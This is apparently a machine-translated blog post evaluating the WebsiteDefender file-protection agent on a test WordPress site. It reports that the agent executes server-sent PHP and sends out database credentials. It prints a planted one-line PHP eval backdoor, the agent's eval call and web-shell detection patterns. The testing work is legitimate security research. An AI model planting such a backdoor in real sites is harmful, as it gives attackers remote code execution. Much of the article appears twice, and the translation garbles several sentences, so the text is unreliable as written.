How WebsiteDefender Works
A few weeks ago, I noticed in a plugin for Wordpress wp security scan advertising another websitedefender service to protect sites. On the site, apart from the standard marketing husk, I did not really find anything useful, but I was somewhat intrigued by the words about a revolutionary other way of operating this service, different from the existing ones. Google did not give anything useful about how this service still works.
Historically, most people consider protection against attacks from the outside sufficient - SQL, XSS injections, LFI \ RFI, CSRF, etc., forgetting attacks on web application files. The same WAF, such as mod_security, phpids is a vivid example.
It seems to me not very fair, so I wanted to consider the possibilities of the WebsiteDefender service, which, by description, should be able to protect web application files from modifications.
')
It is proposed to download a certain agent - php-file, in which a whole set of functions for encryption and ... design
The question of what makes this php code, arose even before downloading it, and after a quick scan and finding such an interesting arsenal there are even more questions. Although the company seems to be quite famous - Acunetix, it’s unlikely that anyone would want to put a cat in a bag on its website.
Support response to the request to provide information that makes their code, and the results of their research of the service under the cat.
From the correspondence I will give only the most important thing.
Me: I just want to know your php code do. Not common information such as 'protect website ...' but more techical details. What is it to collect and send to your server, etc. Because now it is a blackbox for me.
Support answer:
We don't provide specific details.
However, it’s not possible to determine if you’re a WordPress user account. Thus, the WSD agent is used to retrieve our website for analysis. We’re analyzing what there is.
It turns out quite interestingly: they provide a service to protect websites, but they do not disclose specific details of what their agent does. From the last answer it became clear that it was going and sent.
After a couple of days, I installed the dyndns client on my home laptop, registered a test host, installed apache, php, mysql and wordpress, added a reset to the log of the input and output data of their agent and periodically checked the log.
Those interested can see the agent code themselves, everything is simple. The most important thing is that after all sorts of checks for execution , an external php code sent by WebsiteDefender was launched . It turns out a sort of shell, which is used not to hack, but to protect the site.
Suppose you are not confused by the fact that the service, in exchange for a promise to protect your website, requires you to install an agent through which any code can run in the future.
I decided to check how quickly traces of the hacking site will be found:
All changes were detected after 2 days during the next full scan of the site files, before that the robot quietly received md5-hashes. Interestingly, in the Web Shell admin by oRb was marked as a critical threat and identified by different patterns:
/wp-admin/network/wso2.php, template - eval ($ _ POST ['p1']
/wp-admin/includes/wso2_pack.php, template - <? php # Web Shell by oRb.
A shell from Antimatch modestly listed among the new files. Most likely, self-made non-distributed packaged shells will also not mark this status with critical status, although the executable php would first of all be worth highlighting.
Surely, you didn’t even have a thought to install other people's scripts to protect your site. The topic is for informational purposes only. I just want to show on the successfully turned up example that you should not blindly rely on external services - to protect my web applications from modifications of their files and shell uploads, even a simple self-signed file auditor, which, if desired, is written in a couple of hours, but has the reaction time you need and can recover files. Not to mention the configuration of specialized utilities on the server.
Historically, most people consider protection against attacks from the outside sufficient - SQL, XSS injections, LFI \ RFI, CSRF, etc., forgetting attacks on web application files. The same WAF, such as mod_security, phpids is a vivid example.
It seems to me not very fair, so I wanted to consider the possibilities of the WebsiteDefender service, which, by description, should be able to protect web application files from modifications.
')
It is proposed to download a certain agent - php-file, in which a whole set of functions for encryption and ... design
$success = @eval('?>'.$request->params); The question of what makes this php code, arose even before downloading it, and after a quick scan and finding such an interesting arsenal there are even more questions. Although the company seems to be quite famous - Acunetix, it’s unlikely that anyone would want to put a cat in a bag on its website.
Support response to the request to provide information that makes their code, and the results of their research of the service under the cat.
WebsiteDefender does not provide details of their work
From the correspondence I will give only the most important thing.
Me: I just want to know your php code do. Not common information such as 'protect website ...' but more techical details. What is it to collect and send to your server, etc. Because now it is a blackbox for me.
Support answer:
We don't provide specific details.
However, it’s not possible to determine if you’re a WordPress user account. Thus, the WSD agent is used to retrieve our website for analysis. We’re analyzing what there is.
It turns out quite interestingly: they provide a service to protect websites, but they do not disclose specific details of what their agent does. From the last answer it became clear that it was going and sent.
What receives and sends the php-agent WebsiteDefender
After a couple of days, I installed the dyndns client on my home laptop, registered a test host, installed apache, php, mysql and wordpress, added a reset to the log of the input and output data of their agent and periodically checked the log.
Those interested can see the agent code themselves, everything is simple. The most important thing is that after all sorts of checks for execution , an external php code sent by WebsiteDefender was launched . It turns out a sort of shell, which is used not to hack, but to protect the site.
The following data is collected and sent:
- Version php, array $ _SERVER
- The structure of directories and files - a list of files specified extensions (php, html, js, htaccess, ini, log, etc.), and then their sha1-hashes, date of change, access rights
- Database connection settings - name, host, login and password
- Some short strings and their md5 hashes are probably for checking that the agent is working.
Suppose you are not confused by the fact that the service, in exchange for a promise to protect your website, requires you to install an agent through which any code can run in the future.
I decided to check how quickly traces of the hacking site will be found:
- In different directories of the site scattered an old Web Shell by oRb packed and source code, some ancient shell from Antichat
- In the theme footer Wordpress inserted an invisible iframe
- Corrected index.php, adding
if ( $_REQUEST['evil'] == 1 ) { eval( '?>'. $_GET[ 'cmd' ] ); exit(); }
All changes were detected after 2 days during the next full scan of the site files, before that the robot quietly received md5-hashes. Interestingly, in the Web Shell admin by oRb was marked as a critical threat and identified by different patterns:
/wp-admin/network/wso2.php, template - eval ($ _ POST ['p1']
/wp-admin/includes/wso2_pack.php, template - <? php # Web Shell by oRb.
A shell from Antimatch modestly listed among the new files. Most likely, self-made non-distributed packaged shells will also not mark this status with critical status, although the executable php would first of all be worth highlighting.
Instead of conclusions
Surely, you didn’t even have a thought to install other people's scripts to protect your site. The topic is for informational purposes only. I just want to show on the successfully turned up example that you should not blindly rely on external services - to protect my web applications from modifications of their files and shell uploads, even a simple self-signed file auditor, which, if desired, is written in a couple of hours, but has the reaction time you need and can recover files. Not to mention the configuration of specialized utilities on the server.
Source: https://habr.com/ru/post/125681/
All Articles